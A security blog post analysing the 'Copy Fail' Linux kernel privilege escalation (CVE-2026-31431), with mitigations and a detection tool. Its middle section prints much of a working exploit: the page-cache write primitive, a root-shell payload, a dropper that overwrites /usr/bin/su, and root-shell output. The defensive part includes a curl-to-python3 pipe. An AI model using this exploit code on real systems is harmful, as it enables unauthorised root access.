This post is written by Milot Shala, Cybersecurity Director at ANIMARUM, a Red Team Lead and Offensive Security Architect with 25 years of experience across enterprise security, cloud infrastructure, and adversary simulation. This is part of the In the Field series of blog posts.
Note: All testing described in this post was conducted on systems we own or were authorized to test. The exploit code referenced is publicly disclosed by the original researchers, Theori and Xint, at https://copy.fail.
Theori and Xint disclosed Copy Fail on April 29, 2026. We followed the disclosure that morning, pulled the public proof-of-concept, and re-ran it against two of our own lab boxes the same day: Ubuntu 24.04 on AWS and Amazon Linux 2023. Same primitive, same payload, same outcome on both. An unprivileged shell account becomes a root shell in under a minute. The on-disk inode of every file we touched is unchanged. Tripwire would not have noticed. AIDE would not have noticed. We would not have noticed either, if we were not the ones running the exploit.
We want to start this one with two numbers. Nine, and four. Nine years between the day this bug was introduced and the day someone reported it. Four bytes per write, walked across the page cache of any file we can open read-only. That is the entire shape of CVE-2026-31431. There is no race condition, no memory corruption, no per-distribution offset table. Just a logic flaw at the intersection of three legitimate kernel features that have all been doing exactly what they were designed to do since 2017.
What Copy Fail Is
CVE-2026-31431 is a local privilege escalation in the Linux kernel, scored CVSS 7.8 by CERT-EU's Security Advisory 2026-005. The vulnerable code lives in algif_aead, the AEAD half of the kernel's userspace crypto socket interface (AF_ALG). Any unprivileged user with a shell on an affected host can use it to write four chosen bytes at a chosen offset into the page cache of any file the user can open read-only. With enough four-byte writes, the user can replace the cached image of /usr/bin/su with their own static ELF and then execute it. The kernel still grants effective uid 0 because the on-disk inode is untouched and still setuid root. That is the entire chain.
The affected window opens at kernel commit 72548b093ee3 (August 2017, v4.14, the AF_ALG iov_iter rework that made the file-page write primitive reachable via splice) and closes at commit a664bf3d603d (April 2026, the revert of the 2017 in-place AEAD optimization). Theori's disclosure confirms the bug across the cloud-image kernels of Ubuntu 24.04 LTS (6.17.0-1007-aws), Amazon Linux 2023 (6.18.8-9.213.amzn2023), RHEL 10.1 (6.12.0-124.45.1.el10_1), and SUSE 16 (6.12.0-160000.9-default). Our own re-test was narrower. We re-ran the public vulnerability checker against two lab boxes matching the first two of those configurations, Ubuntu 24.04 LTS and Amazon Linux 2023, and both came back vulnerable exactly as documented. Debian, Arch, Fedora, Rocky, Alma, Oracle, and the embedded crowd are all in the same window. Distribution backports started rolling out alongside disclosure on April 29, but as of the CERT-EU advisory the next day, no major enterprise distribution had shipped a fixed kernel package.
The discovery story is its own kind of warning. Theori's Taeyang Lee aimed an automated analysis tool at AF_ALG plus splice as an underexplored attack surface and got Copy Fail back as the highest-severity finding in roughly an hour. The bug had been there for nine years.
The Three Features That Built the Bug
To understand why Copy Fail exists, we have to walk through three pieces of the kernel that work fine on their own and become a four-byte write primitive when they meet in the wrong order.
The first is AF_ALG. This is the address family that exposes the kernel's crypto API to userspace as a socket. An unprivileged process can socket(AF_ALG, SOCK_SEQPACKET, 0), bind to a named cipher, push a key, and request encrypt or decrypt operations through normal socket I/O. There is no capability check on the cipher selection. Any user can request any cipher template the kernel knows about, including the ones that were originally built for IPsec.
The second is splice(). The splice syscall moves bytes between two file descriptors without ever copying them into userspace. When the source is a file backed by the page cache, splice does not duplicate the bytes; it hands the kernel a reference to the actual page-cache pages. That zero-copy property is exactly what splice was added for. It is also what makes Copy Fail possible, because it lets an unprivileged caller deliver page-cache pages of a setuid binary into the destination scatterlist of a crypto operation. The pages stay live, real, mapped, and writable from the kernel's perspective.
The third is the authencesn AEAD template. AEAD stands for Authenticated Encryption with Associated Data. The authencesn variant is a composite cipher built specifically for IPsec's Extended Sequence Number support: it authenticates the associated data, encrypts the plaintext, and rearranges a 32-bit ESN sequence number across the buffer because the IPsec wire format requires that rearrangement. The rearrangement is implemented as four-byte scratch writes into the destination buffer, using scatterwalk_map_and_copy(). Under normal IPsec use, the destination buffer is a freshly allocated kernel page that no one cares about until the operation completes. The scratch writes are invisible.
Each of these three features is reasonable in isolation. AF_ALG is a clean way to expose hardware crypto offload. Splice is a high-performance zero-copy primitive. Authencesn is a correct implementation of IPsec ESN. The bug is in the geometry of how they meet.
The 2017 Optimization That Made the Geometry Wrong
In August 2017, the kernel's algif_aead got an in-place optimization. The change set the request's source and destination scatterlists to the same chain: req->src = req->dst. The reasoning was straightforward. AEAD operations on socket buffers were already working out-of-place on memory the kernel allocated; doing it in place saved an allocation and a copy. Performance went up. Nothing visibly broke.
What that optimization did, in combination with splice and authencesn, was give an unprivileged process a way to ask the kernel to perform a four-byte write into the page cache of a file the process can only open read-only. The chain looks like this. The user opens the target setuid binary read-only. The user binds an AF_ALG socket to authencesn(hmac(sha256),cbc(aes)) and pushes any key (the values do not matter; the kernel only needs setkey to succeed). The user calls splice twice: once to move the binary's page-cache pages into a pipe, and a second time to move them from the pipe into the AF_ALG operation socket. Because of the 2017 optimization, those page-cache pages now sit in both the source and the destination scatterlist of the pending decrypt request. When the user calls recv() to trigger the decrypt, authencesn's ESN rearrangement code performs its scratch writes. Four of those writes land at a controlled offset, with controlled values, into the live page-cache pages of the target binary. The decrypt subsequently fails authentication and returns an error. The error does not matter. The four bytes are already there.
The on-disk file is untouched. The next process that reads or executes that file sees the mutated page-cache image. That is Copy Fail.
Building the Primitive
The shared mutation primitive lives in utils.c of the public C port of the exploit, written by Tony Gies as a portable reimplementation of Theori's original Python proof-of-concept. It is roughly 100 lines and worth reading in full, because the whole vulnerability collapses into one function. Here is the working core, with the boilerplate trimmed:
int patch_chunk(int file_fd, off_t offset,
                const unsigned char four_bytes[4]) {
    int ctrl_sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
    struct sockaddr_alg sa = { .salg_family = AF_ALG };

    memcpy(sa.salg_type, "aead", 5);
    memcpy(sa.salg_name, "authencesn(hmac(sha256),cbc(aes))",
           sizeof "authencesn(hmac(sha256),cbc(aes))");
    bind(ctrl_sock, (struct sockaddr *)&sa, sizeof sa);
    setsockopt(ctrl_sock, SOL_ALG, ALG_SET_KEY,
               AUTHENC_KEY, sizeof AUTHENC_KEY);
    setsockopt(ctrl_sock, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4);

    int op_sock = accept(ctrl_sock, NULL, 0);
    size_t splice_len = (size_t)offset + 4;
    unsigned char aad[8] = {
        'A', 'A', 'A', 'A',
        four_bytes[0], four_bytes[1], four_bytes[2], four_bytes[3],
    };

    /* sendmsg pushes the AAD plus the cmsg control headers
       (ALG_SET_OP=ALG_OP_DECRYPT, ALG_SET_IV, ALG_SET_AEAD_ASSOCLEN=8)
       with MSG_MORE so the kernel waits for the plaintext. */

    int pipefd[2];
    pipe(pipefd);
    off_t src_off = 0;
    splice(file_fd, &src_off, pipefd[1], NULL, splice_len, 0);
    splice(pipefd[0], NULL, op_sock, NULL, splice_len, 0);

    unsigned char *sink = malloc(8 + (size_t)offset);
    recv(op_sock, sink, 8 + (size_t)offset, 0);
    free(sink);
    /* close everything */
    return 0;
}
The aad buffer is the entire payload control surface. The first four bytes are filler associated data. Bytes four through seven are the four bytes that get written into the target's page cache. The splice length is offset + 4, which positions the authencesn scratch write at the chosen offset in the destination. The recv at the end is what actually triggers the decrypt; the kernel performs the operation, authentication fails, the decrypt is rejected, and the four bytes have already been written. Everything else in the function is plumbing.
To overwrite an arbitrary span of bytes, the caller walks patch_chunk() across the target in four-byte windows. To overwrite a 250-byte payload, that is roughly 63 calls. On the systems we tested, the whole loop completes in well under a second.
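The windowing arithmetic is easy to check in isolation. The sketch below simulates the walk against an ordinary in-memory buffer instead of the page cache; fake_patch_chunk, walk_payload, and patch_call_count are our illustrative names, not code from the public exploit:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Number of patch_chunk() calls needed to cover len bytes,
   four bytes per call (ceiling division). */
static size_t patch_call_count(size_t len) {
    return (len + 3) / 4;
}

/* Stand-in for the real primitive: writes four chosen bytes at a
   chosen offset into an ordinary buffer instead of the page cache. */
static void fake_patch_chunk(unsigned char *dst, size_t offset,
                             const unsigned char four_bytes[4]) {
    memcpy(dst + offset, four_bytes, 4);
}

/* Walk a payload across the target in four-byte windows, exactly as
   the dropper does, zero-padding the final partial window. */
static void walk_payload(unsigned char *dst,
                         const unsigned char *payload, size_t len) {
    for (size_t off = 0; off < len; off += 4) {
        unsigned char window[4] = { 0, 0, 0, 0 };
        size_t take = (len - off >= 4) ? 4 : len - off;
        memcpy(window, payload + off, take);
        fake_patch_chunk(dst, off, window);
    }
}
```

For a 250-byte payload, patch_call_count(250) comes out to 63, matching the count above. The zero padding on the final window is why the destination must tolerate up to three bytes of spillover past the payload's end.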
Cashout One: The /etc/passwd UID Flip
The first cashout we tried was the cleanest in spirit. /etc/passwd is world-readable on every standard Linux system. Its layout is fixed: name:x:UID:GID:gecos:home:shell. If we can mutate four bytes of its page cache, we can change a four-digit UID in our own line to 0000, then trigger any code path that resolves users via getpwnam or getpwuid and acts on the resolved uid. Done correctly, that is a root shell with no embedded payload at all.
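Locating the right offset is plain byte arithmetic over a world-readable file. Below is a sketch of that lookup under our own naming (uid_field_offset is not a symbol from the published exploit): given the file's contents and a username, it returns the byte offset of the UID field in that user's line.

```c
#include <assert.h>
#include <string.h>

/* Given the full text of a passwd file and a username, return the byte
   offset of the UID field in that user's line, or -1 if not found.
   Layout per line: name:x:UID:GID:gecos:home:shell. */
static long uid_field_offset(const char *passwd, const char *user) {
    size_t ulen = strlen(user);
    const char *line = passwd;

    while (line && *line) {
        const char *colon = strchr(line, ':');
        if (colon && (size_t)(colon - line) == ulen &&
            memcmp(line, user, ulen) == 0) {
            /* Skip the password placeholder field ("x"). */
            const char *second = strchr(colon + 1, ':');
            if (second)
                return (long)(second + 1 - passwd);
        }
        const char *nl = strchr(line, '\n');
        line = nl ? nl + 1 : NULL;
    }
    return -1;
}
```

The sanity check mentioned below falls out of the same function: read four bytes at the returned offset and confirm they match the current UID before mutating anything.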
The exploit-passwd.c variant locates the UID field for the running user, sanity-checks that the four bytes at that offset match the current uid (so we know the offset math is right), runs patch_chunk() with "0000" as the new value, and then execs su <user> to ride PAM into a root shell. PAM authenticates against /etc/shadow, which we have not touched; the user's real password works. After authentication, su's setuid() reads the corrupted uid from the page-cache /etc/passwd and lands the caller in uid 0.
This worked on the box running util-linux's su. It failed on the box running shadow-utils' su with this message:
su: Cannot determine your user name.
The diagnosis is small but exact. Shadow-utils' su does a caller-identity cross-check before authentication: it calls getpwuid(getuid()) and rejects the operation if the returned passwd entry's uid does not match the kernel's view of the calling uid. Our mutation broke that cross-check. The kernel still saw us as our original uid (the kernel's view comes from the credential structure on the calling process, not from /etc/passwd), but getpwuid() now returned the corrupted entry with uid 0. The mismatch triggered the rejection. The page-cache mutation was successful. The cashout was not.
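The cross-check itself is tiny. The following is our paraphrase of the behavior described above, not shadow-utils' actual source:

```c
#include <pwd.h>
#include <sys/types.h>
#include <unistd.h>

/* Paraphrase of the shadow-utils su identity cross-check: resolve the
   kernel's view of the calling uid through the passwd database and
   require the two views to agree. With a poisoned page-cache copy of
   /etc/passwd, getpwuid() returns the corrupted entry while getuid()
   still reports the credential on the calling process, so this fails. */
static int caller_identity_ok(void) {
    struct passwd *pw = getpwuid(getuid());
    return pw != NULL && pw->pw_uid == getuid();
}
```

On an unmodified system the two views agree and the check passes; after the UID flip, getpwuid() resolves through the mutated page cache and the mismatch is caught.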
Two paths forward from there. One is to pivot to another consumer of getpwnam/getpwuid that does not cross-check, of which there are many on a typical system: WSL2 session spawn, several MTAs during local delivery, sshd with StrictModes disabled, and so on. The other is to abandon the /etc/passwd route entirely and switch to mutating a setuid binary directly. We took the second option because it was the more universal of the two, and because we wanted to confirm the binary-mutation variant worked end-to-end on both test targets.
Cashout Two: The Binary Mutation
The binary-mutation variant overwrites the cached image of a setuid root binary with our own payload, then execs the binary. The kernel grants effective uid 0 because the on-disk inode is still setuid root. Then the kernel loads what it thinks is the binary's text into memory. What it loads is the page-cache pages we just rewrote.
The payload itself is portable C against the kernel's vendored nolibc:
#include "nolibc/nolibc.h"

int main(void) {
    char *argv[] = { "sh", (char *)NULL };
    char *envp[] = { (char *)NULL };

    syscall(__NR_setgid, 0);
    syscall(__NR_setuid, 0);
    execve("/bin/sh", argv, envp);
    return 1;
}
Built against nolibc with -nostdlib -static -ffreestanding, this lands at roughly 1.7 KB on x86_64 and around 2.0 KB on aarch64, versus several hundred kilobytes for the same code linked against glibc-static. The dropper embeds the built ELF as a single relocatable object via ld -r -b binary -o payload.o payload, which gives it three synthesized symbols (_binary_payload_start, _binary_payload_end, _binary_payload_size) it can index directly.
The dropper itself, with the boilerplate cut, is twenty lines:
int main(int argc, char **argv) {
    const char *target = (argc > 1) ? argv[1] : "/usr/bin/su";
    int file_fd = open(target, O_RDONLY);
    size_t len = PAYLOAD_LEN;

    for (off_t off = 0; (size_t)off < len; off += 4) {
        unsigned char window[4] = { 0, 0, 0, 0 };
        size_t take = (len - (size_t)off >= 4) ? 4 : len - (size_t)off;
        memcpy(window, PAYLOAD + off, take);
        patch_chunk(file_fd, off, window);
    }
    close(file_fd);
    execl("/bin/sh", "sh", "-c", "su", (char *)NULL);
    return 1;
}
Open the target. Walk the embedded payload in four-byte windows, call patch_chunk() for each. Exec su through /bin/sh -c. The kernel reads the corrupted text pages from the page cache, sees a setuid-root inode, hands the process root credentials, and runs the payload. The payload calls setgid(0), setuid(0), and execve("/bin/sh", ...).
The Shell
$ id
uid=1000(testuser) gid=1000(testuser) groups=1000(testuser)
$ ./exploit
[+] target: /usr/bin/su
[+] payload: 1696 bytes (424 iterations)
[+] page cache mutated; exec'ing target
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux ip-10-0-1-42 6.17.0-1007-aws #7-Ubuntu SMP ...
No race. No retry. No grooming. Run the dropper, get a root shell. The on-disk inode of /usr/bin/su is byte-for-byte identical to the package version. sha256sum /usr/bin/su returns the same hash before and after. Tripwire and AIDE would both report nothing. The corruption lives only in the page cache, and the page cache will eventually evict it back to disk-backed truth as memory pressure rises or as echo 3 > /proc/sys/vm/drop_caches is run. The window of detection is the window of behavior, not the window of state.
Why This One Matters
Three things make Copy Fail worth understanding past the mechanics of the bug itself.
The first is the latency. The 2011 commit that added authencesn was correct. The 2015 commit that added AF_ALG AEAD support was correct. The 2017 commit that turned the AEAD path in-place was correct. None of them were dangerous in isolation. The bug is the geometry of all three together, and that geometry sat unexamined for nine years across every major distribution. The discovery did not require a new vulnerability class. It required someone to look at AF_ALG plus splice as an attack surface and think about what kind of memory was reachable through it. Theori's automated analysis flagged it in roughly an hour. We do not believe the entire delta was time-on-machine. We believe the delta was attention.
The second is the failure of file-integrity tooling against this bug class. Tripwire, AIDE, OSSEC's syscheck, Wazuh's FIM module, Microsoft Defender for Endpoint's file integrity monitoring on Linux, and Falco's drift-detection rules all assume that if the on-disk inode is unchanged, the file's behavior is unchanged. Copy Fail breaks that assumption directly. The on-disk file is the unchanged file. The running file is something else. Detection has to move from disk-state diffing to runtime behavior, which is a much harder problem and one that very few enterprise environments have actually solved.
The third is the container blast radius. The page cache is not partitioned by namespace. Two containers running on the same kernel that read the same file see the same cached pages. If either of them is unprivileged enough to bind an AF_ALG socket and call splice on a host-mounted file (which is the default unless seccomp explicitly denies AF_ALG), it can mutate the page cache that the other container sees on its next read. The same primitive that gets a local user to root inside one VM gets a malicious pod to root across pods on a Kubernetes node. Multi-tenant Kubernetes operators should be reading the disclosure as a node-escape primitive, not as a userland LPE.
On both lab boxes, the full dropper completed in well under a second against /usr/bin/su. A typical CI runner has the same operational shape: a host with algif_aead loaded, hundreds of unattended jobs per day, and no reason for any of them to bind an AF_ALG socket. None of them are inspected at runtime to confirm that they have not. The exposure is fleet-wide.
What to Do
Patch the kernel as soon as your distribution ships the backport of a664bf3d603d. Until then, disable the algif_aead module persistently and unload it from the running kernel:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null || true
Per CERT-EU Security Advisory 2026-005, this does not affect dm-crypt or LUKS, kTLS, IPsec/XFRM, OpenSSL, GnuTLS, NSS, or SSH; the only consumer it breaks is software explicitly configured to use the OpenSSL afalg engine, which is rare in modern deployments. On containerized workloads, block AF_ALG socket creation via seccomp at the runtime layer; this prevents exploitation even on unpatched kernels and is appropriate as a permanent baseline regardless of patch state. The Docker default seccomp profile and the Kubernetes RuntimeDefault profile should both be reviewed for AF_ALG handling.
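Where editing the runtime's JSON profile is awkward, the same policy can be installed by the workload itself. The sketch below is our own minimal seccomp-bpf filter, not a published profile: it returns EPERM for socket(AF_ALG, ...) and allows everything else. It assumes an ABI with a dedicated socket syscall (x86_64, aarch64), and a production filter should also validate the audit architecture before trusting syscall numbers.

```c
#include <errno.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Deny socket(AF_ALG, ...) with EPERM; allow all other syscalls.
   Note: BPF_ABS at args[0] reads the low 32 bits of the first
   argument, which holds the address family on little-endian ABIs. */
static int deny_af_alg_sockets(void) {
    struct sock_filter filter[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_socket, 0, 3),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, args[0])),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AF_ALG, 0, 1),
        BPF_STMT(BPF_RET | BPF_K,
                 SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = sizeof filter / sizeof filter[0],
        .filter = filter,
    };

    /* Required so an unprivileged process may install a filter. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}
```

After the filter is installed, the exploit's very first syscall fails with EPERM while ordinary networking is unaffected, which is why this works as a permanent baseline even on patched kernels.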
Audit the assumptions of any file-integrity tooling in the environment. If a tool reports on the basis of inode hashes, on-disk read-back, or filesystem audit events, it cannot see Copy Fail. Document that gap explicitly. Where runtime file-behavior monitoring is feasible, move it up the priority list. Where it is not feasible, accept that this class of bug is invisible to your current detection stack and prioritize the patch accordingly.
Treat Kubernetes nodes and CI/CD runners as the highest-priority remediation targets. They run the most untrusted code per host and have the largest blast radius if a single tenant escapes.
Run This in CI Today
Any fleet running Linux kernels from 2017 onward is in scope. The only way to know whether a given host is vulnerable is to exercise the kernel path. Distribution backports do not bump uname -r, so a version-based heuristic produces false negatives. The check has to actually trigger the bug, against a target that is safe to mutate.
To make that easy to run anywhere, we built a small Python detector. It is non-destructive: it creates a temporary file, drives the AF_ALG plus splice primitive against the file's own page cache, reads the file back, and exits 100 if the bytes were rewritten or 0 if they were not. It never touches /usr/bin/su, /etc/passwd, or any file the script did not create itself. The temp file is unlinked on exit and the page-cache mutation evaporates with the inode.
The whole detector is one file of roughly 150 lines of well-commented Python with no third-party dependencies. The source lives at github.com/ANIMARUM-Cyber/copy-fail-check. Read it before you run it.
For an ad-hoc check on any Linux box with Python 3.10 or later:
curl -fsSL https://raw.githubusercontent.com/ANIMARUM-Cyber/copy-fail-check/main/check.py | python3 -
For native GitHub Actions integration, the same detector ships as a composite action that fails the workflow when the runner kernel is vulnerable:
- name: Check runner kernel for Copy Fail (CVE-2026-31431)
  uses: ANIMARUM-Cyber/copy-fail-check@v1
Exit codes are stable across both forms. 100 means vulnerable, 0 means not vulnerable or the AF_ALG path is structurally blocked in this environment, and 1 means the detector itself failed to run. Tooling that consumes the result should branch on those three values rather than parse stdout.
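Consumed from C, that branching looks like the sketch below. The classify helper and its enum are our own names; the command string passed to system() stands in for however the detector is actually invoked in your pipeline.

```c
#include <stdlib.h>
#include <sys/wait.h>

enum check_result {
    CHECK_NOT_VULNERABLE = 0,
    CHECK_ERROR          = 1,
    CHECK_VULNERABLE     = 100,
    CHECK_UNKNOWN        = -1,
};

/* Map the detector's wait status onto its three documented exit
   codes. Anything else, including death by signal, is treated as
   unknown rather than silently folded into "not vulnerable". */
static enum check_result classify(int wait_status) {
    if (!WIFEXITED(wait_status))
        return CHECK_UNKNOWN;
    switch (WEXITSTATUS(wait_status)) {
    case 100: return CHECK_VULNERABLE;
    case 0:   return CHECK_NOT_VULNERABLE;
    case 1:   return CHECK_ERROR;
    default:  return CHECK_UNKNOWN;
    }
}
```

A caller would then do something like classify(system("python3 check.py")) and fail closed on both CHECK_ERROR and CHECK_UNKNOWN, since a detector that could not run tells you nothing about the kernel.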
The CI check is the right tool for the runner you are about to build on. For continuous coverage of the fleet behind it, including assets that drift back into exposure as new images are baked and as patch state changes underneath you, that is what we built StacIntel for. https://stacintel.se
The Close
For nine years, three legitimate kernel features did exactly what they were designed to do. The bug was in the spaces between them. The on-disk file did not change. The kernel changed its mind about who you were.
Four bytes at a time. That was the entire exploit.